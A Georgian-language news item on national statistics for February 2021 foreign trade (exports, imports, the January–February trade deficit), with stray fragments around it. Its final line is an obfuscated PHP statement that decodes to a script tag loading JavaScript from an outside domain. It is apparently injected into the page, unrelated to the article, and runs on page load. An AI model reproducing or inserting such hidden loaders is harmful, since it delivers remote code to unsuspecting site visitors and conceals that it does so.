celsiusi
ავერსი შნაიდერი
სტატისტიკის ეროვნული სამსახურის მიერ  დღეს გავრცელებული  2021 წლის თებერვლის საგარეო ვაჭრობის ამსახველი ანგარიშის თანახმად, გასული თვის განმავლობაში საქართველოდან ექსპორტი გაიზარდა და $270.3 მილიონი დოლარი შეადგინა, რაც 2020 წლის ანალოგიური პერიოდის მაჩვენებელს $7.7 მილიონი დოლარით ანუ 2.93%-ით აღემატება. 
 
რაც შეეხება იმპორტის მოცულობას, ის თებერვალში $85.9 მილიონი დოლარით ანუ 12.2%-ით შემცირდა და $618.2 მილიონი დოლარი შეადგინა. 
 
მთლიანობაში, იანვარ-თებერვალში საქართველოს ექპორტი $494.7 მილიონი იყო, რაც 2020 წლის მაჩვენებელთან შედარებით 6.8%-ით ნაკლებია. იმპორტის მოცულობა კი $1.16 მილიარდი დოლარი იყო, რაც 2020 წელთან შედარებით 14.1%-ით ნაკლებია. 
 
უარყოფითმა სავაჭრო ბალანსმა 2021 წლის პირველ ორ თვეში $664.6 მილიონი დოლარი და საგარეო სავაჭრო ბრუნვის 40.2% შეადგინა.
 
საქსტატი საგარეო ვაჭრობის დეტალურ მაჩვენებლებს 19 მარტს გამოაქვეყნებს და აღნიშნული ანგარიშით გაირკვევა, თუ რომელი საქონლის ექსპორტის ზრდამ განაპირობა თებერვალში ექსპორტის მოცულობის მატება. 
1385
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");